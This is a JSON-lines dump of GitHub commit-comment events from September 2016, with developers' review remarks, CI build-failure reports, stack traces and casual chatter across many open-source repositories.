{"id":"4573446465","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"ENOW-IJI/storm"},"payload":{"comment":{"id":19052454,"position":null,"line":null,"path":null,"commit_id":"27829c85b3be9c2c7d80ab9e0573fee380d64b84","created_at":"2016-09-16T11:07:27Z","updated_at":"2016-09-16T11:07:27Z","body":"#10"}},"created_at":"2016-09-16T11:07:27Z"}
{"id":"4573451614","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":19052469,"position":null,"line":null,"path":null,"commit_id":"209750c49982ad49ce5324d00498ad6aa65e2dce","created_at":"2016-09-16T11:08:35Z","updated_at":"2016-09-16T11:08:35Z","body":"@chelmuth: please add to staging"}},"created_at":"2016-09-16T11:08:35Z"}
{"id":"4573452274","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"ENOW-IJI/storm"},"payload":{"comment":{"id":19052472,"position":null,"line":null,"path":null,"commit_id":"567b90e1c0fb04cab105f1f4295394c170e4ff00","created_at":"2016-09-16T11:08:45Z","updated_at":"2016-09-16T11:08:45Z","body":"#10 "}},"created_at":"2016-09-16T11:08:45Z"}
{"id":"4573453664","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052476,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T11:09:09Z","updated_at":"2016-09-16T11:09:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1017](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13417&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 214, ignored: 3 Build time: 00:10:51\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.core.UpdateRequestResourceSpec.accepts new updates with a Client specific format: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-16T11:09:09Z"}
{"id":"4573456640","type":"CommitCommentEvent","actor":{"login":"Toxantron"},"repo":{"name":"dbeuchler/effort"},"payload":{"comment":{"id":19052488,"position":null,"line":null,"path":null,"commit_id":"e6ebb9608b11ca5e57084eaa6d1275fa7f2fda6f","created_at":"2016-09-16T11:09:59Z","updated_at":"2016-09-16T11:09:59Z","body":"Fixed our unit test issue of conflicting entities?"}},"created_at":"2016-09-16T11:09:59Z"}
{"id":"4573458243","type":"CommitCommentEvent","actor":{"login":"olanowak"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":19052493,"position":5,"line":17,"path":"cassandra-connector/pom.xml","commit_id":"9f3ce055de608d0aaa5673291790404b437bcd0e","created_at":"2016-09-16T11:10:26Z","updated_at":"2016-09-16T11:10:26Z","body":"I believe we shouldn't override the parent pom setting."}},"created_at":"2016-09-16T11:10:26Z"}
{"id":"4573458795","type":"CommitCommentEvent","actor":{"login":"mafrosis"},"repo":{"name":"oii/ogre"},"payload":{"comment":{"id":19052496,"position":69,"line":69,"path":"ogreclient/dist/vagrant-windows/OGRE/OgreClientService/OgreWrapper.cs","commit_id":"0382191baddd5eda889c3d2c093eb3b38da5d21e","created_at":"2016-09-16T11:10:34Z","updated_at":"2016-09-16T11:10:34Z","body":"LOL go do some corpse cards"}},"created_at":"2016-09-16T11:10:34Z"}
{"id":"4573462115","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19052512,"position":null,"line":null,"path":null,"commit_id":"91903cb0b88f915f109cd7cd74f9e294afae299e","created_at":"2016-09-16T11:11:26Z","updated_at":"2016-09-16T11:11:26Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/484/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-16T11:11:26Z"}
{"id":"4573462835","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052515,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T11:11:37Z","updated_at":"2016-09-16T11:11:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1018](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13419&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T11:11:37Z"}
{"id":"4573463350","type":"CommitCommentEvent","actor":{"login":"kris-nova"},"repo":{"name":"DualSpark/kops"},"payload":{"comment":{"id":19052519,"position":3,"line":3,"path":"create_example.yml","commit_id":"1b48258c6c62a6feec84ce936c96439f87bb3351","created_at":"2016-09-16T11:11:46Z","updated_at":"2016-09-16T11:11:46Z","body":"Hey @scottvidmar - Sorry this one must have slipped away from me.\r\n\r\nThe .yml file here is a representation of command line flags that a kops user can use. Defined [here](https://github.com/kubernetes/kops/blob/master/cmd/kops/create_cluster.go#L17).\r\n\r\nIn this case think of the --yes as the inverse of a --dry-run.. The --yes is required for users who are very certain they are ready to process their command. Otherwise kops will do a dry run, and echo out to the user what it would potentially be doing.\r\n\r\nBasically the --yes is a safety net. Because it's a valid command line flag - it is encapsulated here in the .yml"}},"created_at":"2016-09-16T11:11:46Z"}
{"id":"4573465351","type":"CommitCommentEvent","actor":{"login":"franbenz"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19052524,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T11:12:16Z","updated_at":"2016-09-16T11:12:16Z","body":"@tolyo thanks, the build is successfully finishing, including files with lint errors, but showing warnings for them.\r\nShould the build fail on lint errors?"}},"created_at":"2016-09-16T11:12:16Z"}
{"id":"4573469871","type":"CommitCommentEvent","actor":{"login":"tomaka"},"repo":{"name":"alexcrichton/futures-rs"},"payload":{"comment":{"id":19052536,"position":null,"line":null,"path":null,"commit_id":"22afb84dbe254110685f2618b38ad7de5048888d","created_at":"2016-09-16T11:13:33Z","updated_at":"2016-09-16T11:13:33Z","body":"I don't really understand why this couldn't be 0.2."}},"created_at":"2016-09-16T11:13:33Z"}
{"id":"4573472275","type":"CommitCommentEvent","actor":{"login":"teh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19052542,"position":null,"line":null,"path":null,"commit_id":"e43a15720d62f6640d21ed49c12a3b76a563e99e","created_at":"2016-09-16T11:14:14Z","updated_at":"2016-09-16T11:14:14Z","body":"+1 to removing the auto-opening of the firewall, that's way too dangerous unless you run in private nets like on ec2 - @globin do you want to send a PR or shall I?"}},"created_at":"2016-09-16T11:14:14Z"}
{"id":"4573477074","type":"CommitCommentEvent","actor":{"login":"CometKim"},"repo":{"name":"CometKim/cb-mattermost"},"payload":{"comment":{"id":19052564,"position":4,"line":4,"path":"README.md","commit_id":"4b671749209721b8d19d98d8a1fe1257b57f63e1","created_at":"2016-09-16T11:15:31Z","updated_at":"2016-09-16T11:15:31Z","body":"ㅁㅇㄴㄹ"}},"created_at":"2016-09-16T11:15:31Z"}
{"id":"4573477241","type":"CommitCommentEvent","actor":{"login":"CometKim"},"repo":{"name":"CometKim/cb-mattermost"},"payload":{"comment":{"id":19052565,"position":4,"line":4,"path":"README.md","commit_id":"4b671749209721b8d19d98d8a1fe1257b57f63e1","created_at":"2016-09-16T11:15:34Z","updated_at":"2016-09-16T11:15:34Z","body":"ㅇㄴㅁㄻㄴㅇ"}},"created_at":"2016-09-16T11:15:34Z"}
{"id":"4573486183","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19052578,"position":null,"line":null,"path":null,"commit_id":"02b62d3615ba7c134404105fbb75c0d10af33683","created_at":"2016-09-16T11:18:02Z","updated_at":"2016-09-16T11:18:02Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/485/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-16T11:18:02Z"}
{"id":"4573490099","type":"CommitCommentEvent","actor":{"login":"tolyo"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19052589,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T11:19:07Z","updated_at":"2016-09-16T11:19:07Z","body":"@franbenz Can you give an example of an error you are seeing?"}},"created_at":"2016-09-16T11:19:07Z"}
{"id":"4573491580","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19052595,"position":4,"line":59,"path":"lib/cli/commands/build.js","commit_id":"614bbd8e102bcf24d078800c072622f054e0f95b","created_at":"2016-09-16T11:19:30Z","updated_at":"2016-09-16T11:19:30Z","body":"Good catch"}},"created_at":"2016-09-16T11:19:30Z"}
{"id":"4573492529","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19052599,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-16T11:19:46Z","updated_at":"2016-09-16T11:19:46Z","body":"Just updated to `0.33.0`. Getting the following,\r\n\r\n```java\r\n                                                                   Process: chat.belong.hello, PID: 23792\r\n                                                                   java.lang.AbstractMethodError: abstract method \"void com.facebook.react.bridge.ActivityEventListener.onActivityResult(android.app.Activity, int, int, android.content.Intent)\"\r\n                                                                       at com.facebook.react.bridge.ReactContext.onActivityResult(ReactContext.java:210)\r\n                                                                       at com.facebook.react.XReactInstanceManagerImpl.onActivityResult(XReactInstanceManagerImpl.java:612)\r\n                                                                       at com.facebook.react.ReactActivityDelegate.onActivityResult(ReactActivityDelegate.java:134)\r\n                                                                       at com.facebook.react.ReactActivity.onActivityResult(ReactActivity.java:77)\r\n                                                                       at chat.belong.hello.MainActivity.onActivityResult(MainActivity.java:64)\r\n                                                                       at android.app.Activity.dispatchActivityResult(Activity.java:6470)\r\n                                                                       at android.app.ActivityThread.deliverResults(ActivityThread.java:3716)\r\n                                                                       at android.app.ActivityThread.handleSendResult(ActivityThread.java:3763)\r\n                                                                       at android.app.ActivityThread.-wrap16(ActivityThread.java)\r\n                                                                       at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1403)\r\n                                                                       at android.os.Handler.dispatchMessage(Handler.java:102)\r\n                                                                       at android.os.Looper.loop(Looper.java:148)\r\n                                                                       at android.app.ActivityThread.main(ActivityThread.java:5443)\r\n                                                                       at java.lang.reflect.Method.invoke(Native Method)\r\n                                                                       at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:728)\r\n                                                                       at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:618)\r\n```\r\n\r\nThe code in `MyActivity.java` is the following,\r\n\r\n```java\r\n    @Override\r\n    public void onActivityResult(int requestCode, int resultCode, Intent data) {\r\n        super.onActivityResult(requestCode, resultCode, data);\r\n        MainApplication.getCallbackManager().onActivityResult(requestCode, resultCode, data);\r\n    }\r\n```"}},"created_at":"2016-09-16T11:19:46Z"}
{"id":"4573492720","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19052601,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T11:19:50Z","updated_at":"2016-09-16T11:19:50Z","body":"AMOEBA 1.4 IS OUT!"}},"created_at":"2016-09-16T11:19:50Z"}
{"id":"4573495658","type":"CommitCommentEvent","actor":{"login":"oferRounds"},"repo":{"name":"layerhq/Atlas-iOS"},"payload":{"comment":{"id":19052617,"position":null,"line":null,"path":null,"commit_id":"0f66a8b87c27528fb69089d6e528ee8557a4f165","created_at":"2016-09-16T11:20:36Z","updated_at":"2016-09-16T11:20:36Z","body":"@daniel-maness I'm also getting many crashes after this change, couldn't yet verify that it's the same one mentioned above"}},"created_at":"2016-09-16T11:20:36Z"}
{"id":"4573498684","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052621,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T11:21:25Z","updated_at":"2016-09-16T11:21:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1018](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13419&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 211, ignored: 3 Build time: 00:09:47\n### Failed tests\n```\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-16T11:21:25Z"}
{"id":"4573500728","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19052624,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-16T11:21:54Z","updated_at":"2016-09-16T11:21:54Z","body":"@foghina Any idea what's happening here?"}},"created_at":"2016-09-16T11:21:54Z"}
{"id":"4573501859","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19052629,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T11:22:16Z","updated_at":"2016-09-16T11:22:16Z","body":"Is this some sort of chess thing?"}},"created_at":"2016-09-16T11:22:16Z"}
{"id":"4573502343","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19052630,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T11:22:24Z","updated_at":"2016-09-16T11:22:24Z","body":"YES! IT'S IN D!\r\n"}},"created_at":"2016-09-16T11:22:24Z"}
{"id":"4573503058","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19052632,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T11:22:36Z","updated_at":"2016-09-16T11:22:36Z","body":"Ah. "}},"created_at":"2016-09-16T11:22:36Z"}
{"id":"4573503813","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19052634,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T11:22:50Z","updated_at":"2016-09-16T11:22:50Z","body":"It's beating GNU chess on time controls :)"}},"created_at":"2016-09-16T11:22:50Z"}
{"id":"4573505689","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19052640,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T11:23:21Z","updated_at":"2016-09-16T11:23:21Z","body":"40 moves in 4 minutes."}},"created_at":"2016-09-16T11:23:21Z"}
{"id":"4573508216","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19052654,"position":null,"line":null,"path":null,"commit_id":"23ce7f02693f5707dcf6b2ec7635743f5870f83e","created_at":"2016-09-16T11:24:05Z","updated_at":"2016-09-16T11:24:05Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/486/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-16T11:24:05Z"}
{"id":"4573512387","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19052660,"position":null,"line":null,"path":null,"commit_id":"c990c5d67e10939b8e85b95e46ea00b7227c5e40","created_at":"2016-09-16T11:25:14Z","updated_at":"2016-09-16T11:25:14Z","body":"提现把config.ini加进.gitignore的重要性。。"}},"created_at":"2016-09-16T11:25:14Z"}
{"id":"4573515452","type":"CommitCommentEvent","actor":{"login":"debowin"},"repo":{"name":"Dipesh-Reen/RPSLS"},"payload":{"comment":{"id":19052667,"position":null,"line":null,"path":null,"commit_id":"597481279d88587e00ff488de6acebfc06501632","created_at":"2016-09-16T11:26:06Z","updated_at":"2016-09-16T11:26:06Z","body":"What a contri bro! 👍  💯 "}},"created_at":"2016-09-16T11:26:06Z"}
{"id":"4573517609","type":"CommitCommentEvent","actor":{"login":"slluis"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19052670,"position":null,"line":null,"path":null,"commit_id":"9804bbc9dae393e03f1750ab50807d326be0e980","created_at":"2016-09-16T11:26:39Z","updated_at":"2016-09-16T11:26:39Z","body":"There was no exception, just a crash in the runtime. When you write memory where you are not supposed to, weird things can happen, and not necessarily when you do the write, it can be a side effect that manifests later on. "}},"created_at":"2016-09-16T11:26:39Z"}
{"id":"4573518710","type":"CommitCommentEvent","actor":{"login":"franbenz"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19052672,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T11:26:58Z","updated_at":"2016-09-16T11:26:58Z","body":"@tolyo I just add an unexpected space or any other lint error on home-controller.js. \r\n```\r\n16 Sep 07:24:45 - warn: Linting of app/modules/home/home-controller.js: warn: ESLint detected 1 error:\r\n     2:14   error  Unexpected space before function parentheses.  space-before-function-paren\r\n16 Sep 07:24:45 - info: compiled home-controller.js and 26 cached files into 2 files in 432ms\r\n```\r\n"}},"created_at":"2016-09-16T11:26:58Z"}
{"id":"4573519725","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052675,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T11:27:15Z","updated_at":"2016-09-16T11:27:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1019](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13420&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T11:27:15Z"}
{"id":"4573519851","type":"CommitCommentEvent","actor":{"login":"onderkalaci"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":19052676,"position":4,"line":29,"path":"src/include/distributed/pg_dist_partition.h","commit_id":"4756d6797a1f0c925c66122f3a07c4f6dc31e549","created_at":"2016-09-16T11:27:17Z","updated_at":"2016-09-16T11:27:17Z","body":"Hmm, it looks like we have a problem here. `CATALOG_VARLEN` should always come last. \r\nI'm curious whether is it a must to have the same order of the columns in the table and on the `FormData` struct. If not, we could simply add `colocationid` before the `partkey` on the struct.\r\n\r\nCould you please search for that? Maybe check with @anarazel?"}},"created_at":"2016-09-16T11:27:17Z"}
{"id":"4573522720","type":"CommitCommentEvent","actor":{"login":"hacan"},"repo":{"name":"StevenMLocke/RL"},"payload":{"comment":{"id":19052684,"position":null,"line":null,"path":null,"commit_id":"c7fe85cb1d898b17fcf26ad54a7d677ec40dad7d","created_at":"2016-09-16T11:28:06Z","updated_at":"2016-09-16T11:28:06Z","body":"hello StevenMLocke I use your plug-in on your site, not for commercial purposes (my site is devoted to game Rocket League) After yesterday's update, Twitch banned anonymous call to its api, your plugin stopped working. I myself am not very good at Java. Therefore I write here., Prompt or help return the plugin to a working state. Thank you in advance. regards"}},"created_at":"2016-09-16T11:28:06Z"}
{"id":"4573526173","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19052689,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-16T11:28:51Z","updated_at":"2016-09-16T11:28:51Z","body":"> too modest to mention it ;P\r\n\r\n😳\r\n\r\nYeah, [compile time clock tree validation is awesome](http://blog.xpcc.io/2015/06/08/computing-and-asserting-baudrate-settings-at-compile-time/).\r\n\r\n"}},"created_at":"2016-09-16T11:28:51Z"}
{"id":"4573527625","type":"CommitCommentEvent","actor":{"login":"kpawelski"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":19052691,"position":null,"line":null,"path":null,"commit_id":"04898c49b245f9db4417cee414c23073e5b2e395","created_at":"2016-09-16T11:29:15Z","updated_at":"2016-09-16T11:29:15Z","body":"What about standards?  Do we use _ to separate words? \r\ninstead of this it belonged to fix translations file."}},"created_at":"2016-09-16T11:29:15Z"}
{"id":"4573528526","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19052695,"position":10,"line":482,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T11:29:31Z","updated_at":"2016-09-16T11:29:31Z","body":"Since the throw is part of the signature, I think you also have a breakage at runtime if you have an extension that's been compiled against the previous signature and you try ti deploy it into an XWiki version where the signature has changed."}},"created_at":"2016-09-16T11:29:31Z"}
{"id":"4573528676","type":"CommitCommentEvent","actor":{"login":"Ma27"},"repo":{"name":"Sententiaregum/sententiaregum-flux-react"},"payload":{"comment":{"id":19052696,"position":null,"line":null,"path":null,"commit_id":"e52a1108f472fa6e7e16a0f40450ef0cc95f1d79","created_at":"2016-09-16T11:29:35Z","updated_at":"2016-09-16T11:29:35Z","body":"ping @Sententiaregum/javascript-package-maintainers "}},"created_at":"2016-09-16T11:29:35Z"}
{"id":"4573530638","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19052699,"position":null,"line":null,"path":null,"commit_id":"42454158b712cfd3ba063e1edc1f7172693f18c8","created_at":"2016-09-16T11:30:07Z","updated_at":"2016-09-16T11:30:07Z","body":"In what condition catchException is called with NULL status?"}},"created_at":"2016-09-16T11:30:07Z"}
{"id":"4573531007","type":"CommitCommentEvent","actor":{"login":"Murashko-Denis"},"repo":{"name":"Murashko-Denis/System-of-vote"},"payload":{"comment":{"id":19052700,"position":null,"line":null,"path":null,"commit_id":"012f8629fc552fa8a51a73ec255f11caf1b32164","created_at":"2016-09-16T11:30:14Z","updated_at":"2016-09-16T11:30:14Z","body":"Добавить сущность Голос, Результат голосования.\nВарианты использования: дб действие человека, ответ программы.\nКаждый логинится: ответ залогинились.\nЛогинится кандидат - подает свою кандидатуру, Избират комиссия - одобряет - кандидат это видит."}},"created_at":"2016-09-16T11:30:14Z"}
{"id":"4573531609","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":19052701,"position":22,"line":829,"path":"rtengine/dcrop.cc","commit_id":"b9f2e27d60ebf66591d800d74075af1a2222e089","created_at":"2016-09-16T11:30:22Z","updated_at":"2016-09-16T11:30:22Z","body":"@Desmis This is a \"fake\" mutex that won't protect you from anything. Each thread will create its own. For real protection, you have to have a common mutex, e.g. as a class member or (not preferred) a global variable."}},"created_at":"2016-09-16T11:30:22Z"}
{"id":"4573532832","type":"CommitCommentEvent","actor":{"login":"vasekp"},"repo":{"name":"vasekp/QIClib"},"payload":{"comment":{"id":19052702,"position":null,"line":null,"path":null,"commit_id":"7798d57507c166b964ac41ce14d7bf64b71573ea","created_at":"2016-09-16T11:30:41Z","updated_at":"2016-09-16T11:30:41Z","body":"Sure, I was meaning to do so earlier but forgot. Thanks for your appreciation. And thank you so much for all the work you're putting into developing QIClib!"}},"created_at":"2016-09-16T11:30:41Z"}
{"id":"4573536333","type":"CommitCommentEvent","actor":{"login":"munchluxe63"},"repo":{"name":"gcwnow/buildroot"},"payload":{"comment":{"id":19052706,"position":null,"line":null,"path":null,"commit_id":"24a5765156bcd29a464db3588052d7f6c1eafd57","created_at":"2016-09-16T11:31:39Z","updated_at":"2016-09-16T11:31:39Z","body":"Line 10 should now be:\r\n\r\n`LIBPNG_SITE = http://downloads.sourceforge.net/project/libpng/libpng${LIBPNG_SERIES}/older-releases/$(LIBPNG_VERSION)`\r\n\r\nelse 404"}},"created_at":"2016-09-16T11:31:39Z"}
{"id":"4573539861","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19052715,"position":null,"line":null,"path":null,"commit_id":"af9c276d66d86c48db6367e21129daf59f2586f9","created_at":"2016-09-16T11:32:38Z","updated_at":"2016-09-16T11:32:38Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/487/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-16T11:32:38Z"}
{"id":"4573540048","type":"CommitCommentEvent","actor":{"login":"kevross33"},"repo":{"name":"cuckoosandbox/community"},"payload":{"comment":{"id":19052716,"position":null,"line":null,"path":null,"commit_id":"23c4e4f77850c8f1ed7f4712466872d91d544d8f","created_at":"2016-09-16T11:32:41Z","updated_at":"2016-09-16T11:32:41Z","body":"I have found I actually am not using it (I think it might be left from an early build) so I have removed it in my pull request for the stack pivot APIs"}},"created_at":"2016-09-16T11:32:41Z"}
{"id":"4573543856","type":"CommitCommentEvent","actor":{"login":"compito"},"repo":{"name":"Motillo/klarna-checkout-nopcommerce"},"payload":{"comment":{"id":19052728,"position":null,"line":null,"path":null,"commit_id":"5b1f2e2c9017f8710a6f2db87e46d6e66625f2d7","created_at":"2016-09-16T11:33:47Z","updated_at":"2016-09-16T11:33:47Z","body":"Hi, the precompiled package for this release is missing, are you gonna release it here?\r\n\r\nThanks,\r\nDamir"}},"created_at":"2016-09-16T11:33:47Z"}
{"id":"4573544626","type":"CommitCommentEvent","actor":{"login":"mkaput"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19052729,"position":25,"line":59,"path":"src/main/kotlin/org/rust/lang/core/symbols/RustPath.kt","commit_id":"0095b8974f0a74ebcc7a675fb9fbdae0cdbe6e10","created_at":"2016-09-16T11:34:02Z","updated_at":"2016-09-16T11:34:02Z","body":"I don't think that making companion object implement very specific interface is good idea"}},"created_at":"2016-09-16T11:34:02Z"}
{"id":"4573545409","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19052732,"position":null,"line":null,"path":null,"commit_id":"74cfca281d22b70e85e0af4f9cd8a2ea5ab3b1c9","created_at":"2016-09-16T11:34:14Z","updated_at":"2016-09-16T11:34:14Z","body":"Java多态\r\n父类中方法如果为静态，该方法就不具备多态性"}},"created_at":"2016-09-16T11:34:14Z"}
{"id":"4573546318","type":"CommitCommentEvent","actor":{"login":"dbeuchler"},"repo":{"name":"dbeuchler/effort"},"payload":{"comment":{"id":19052735,"position":null,"line":null,"path":null,"commit_id":"e6ebb9608b11ca5e57084eaa6d1275fa7f2fda6f","created_at":"2016-09-16T11:34:31Z","updated_at":"2016-09-16T11:34:31Z","body":"Yeas, indeed ;-)"}},"created_at":"2016-09-16T11:34:31Z"}
{"id":"4573547340","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19052738,"position":403,"line":222,"path":"runtime/src/main/java/com/tns/Runtime.java","commit_id":"90b76f9a182b5eea47394bfbf4b3e1b3878baa50","created_at":"2016-09-16T11:34:48Z","updated_at":"2016-09-16T11:34:48Z","body":"By moving the initialization of the `WorkerThreadHandler` into the constructor we will be guaranteed to have an initialized handler on the new thread and there will be no need to check if the handler is initialized and resend the message.\r\nSpecification states that the messages sent from main -> worker should arrive in the order they were sent. We would break that rule if we resent the first few messages, while the worker handler isn't initialized."}},"created_at":"2016-09-16T11:34:48Z"}
{"id":"4573548120","type":"CommitCommentEvent","actor":{"login":"fornwall"},"repo":{"name":"termux/termux-packages"},"payload":{"comment":{"id":19052742,"position":null,"line":null,"path":null,"commit_id":"32ef012d3c5275f33ed388600ec9d1173dbe4311","created_at":"2016-09-16T11:35:02Z","updated_at":"2016-09-16T11:35:02Z","body":"@tinydynamite00 Should now be fixed by the 3.5.2-3 build available in the apt repo!"}},"created_at":"2016-09-16T11:35:02Z"}
